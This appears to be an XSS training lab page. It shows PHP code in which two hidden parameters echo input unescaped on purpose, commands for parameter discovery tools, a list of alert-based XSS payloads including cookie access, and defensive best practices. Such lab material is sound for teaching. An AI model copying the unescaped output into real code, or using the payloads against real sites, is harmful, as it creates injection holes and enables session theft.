Multi-Parameter XSS Lab

Test XSS across multiple parameters with different security levels

Multiple Parameter Challenge

Lab Overview

This lab contains multiple parameters with different security implementations. Some parameters use secure encoding while others have no filtering at all.

Visible Parameters: fname and lname use secure HTML encoding with htmlspecialchars().
Hidden Parameters: There are additional parameters not shown in the main form. Use tools like Arjun to discover them!
# use arjun tool to find hidden parameter
Parameter Security Levels:
Secure fname, lname, page_id - Uses htmlspecialchars()
Vulnerable ll, ptu - No filtering (direct output)
GET All parameters use GET method
Multiple 4 total parameters to test
Overall Security Level: Mixed Implementation

Objective: Discover all parameters and identify which ones are vulnerable to XSS attacks.

Backend Source Code 
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["page_id"])){
    echo htmlspecialchars($_GET["page_id"], ENT_QUOTES);
}
elseif(isset($_GET["ll"])){
    echo $_GET["ll"];
}
elseif(isset($_GET["ptu"])){
    echo $_GET["ptu"];
}
# use arjun tool to find hidden parameter
Test Input Forms
Visible Parameters (HTML Encoded)
This parameter uses htmlspecialchars() encoding
This parameter uses htmlspecialchars() encoding
Hidden Parameters
Hint: Some parameter names are not shown in the main form. You need to discover them using parameter discovery tools.
This parameter uses htmlspecialchars() encoding
This parameter has NO filtering - direct output
This parameter has NO filtering - direct output
Parameter Discovery & Testing Guide
Parameter Discovery Tools:
  • Arjun: arjun -u https://example.com
  • ParamSpider: python3 paramspider.py -d example.com
  • FFUF: ffuf -w wordlist.txt -u https://example.com?FUZZ=test
  • Manual testing: Try common parameter names
Testing Strategy:
  • Test all discovered parameters with XSS payloads
  • Focus on parameters without output encoding
  • Try different contexts (HTML, JavaScript, attributes)
  • Use both reflected and stored XSS techniques
  • Check for DOM-based XSS in client-side code
Security Implications

This lab demonstrates:

  • Mixed security implementations create vulnerabilities
  • Hidden parameters are often overlooked in security testing
  • Inconsistent filtering leads to security gaps
  • Parameter discovery is critical for comprehensive testing
  • Even a single vulnerable parameter can compromise the application
  • Security must be consistent across all endpoints and parameters
Best Practices

For secure web applications:

  • Use consistent output encoding across all parameters
  • Implement Content Security Policy (CSP) headers
  • Validate and sanitize all user inputs
  • Use parameter allowlists instead of discovery-based security
  • Conduct comprehensive security testing
  • Document all API endpoints and parameters
  • Use security headers: X-XSS-Protection, X-Content-Type-Options
XSS Payload Examples for Vulnerable Parameters
Basic Script Tags:
  • <script>alert(1)</script>
  • <script>alert(document.domain)</script>
  • <script>alert(document.cookie)</script>
Event Handlers:
  • <img src=x onerror=alert(1)>
  • <body onload=alert(1)>
  • <svg onload=alert(1)>
JavaScript Protocol:
  • <a href="javascript:alert(1)">click</a>
  • <iframe src="javascript:alert(1)"></iframe>
  • <form action="javascript:alert(1)"><input type=submit></form>
Advanced Techniques:
  • <script src="data:text/javascript,alert(1)"></script>
  • <object data="javascript:alert(1)"></object>
  • <embed src="javascript:alert(1)"></embed>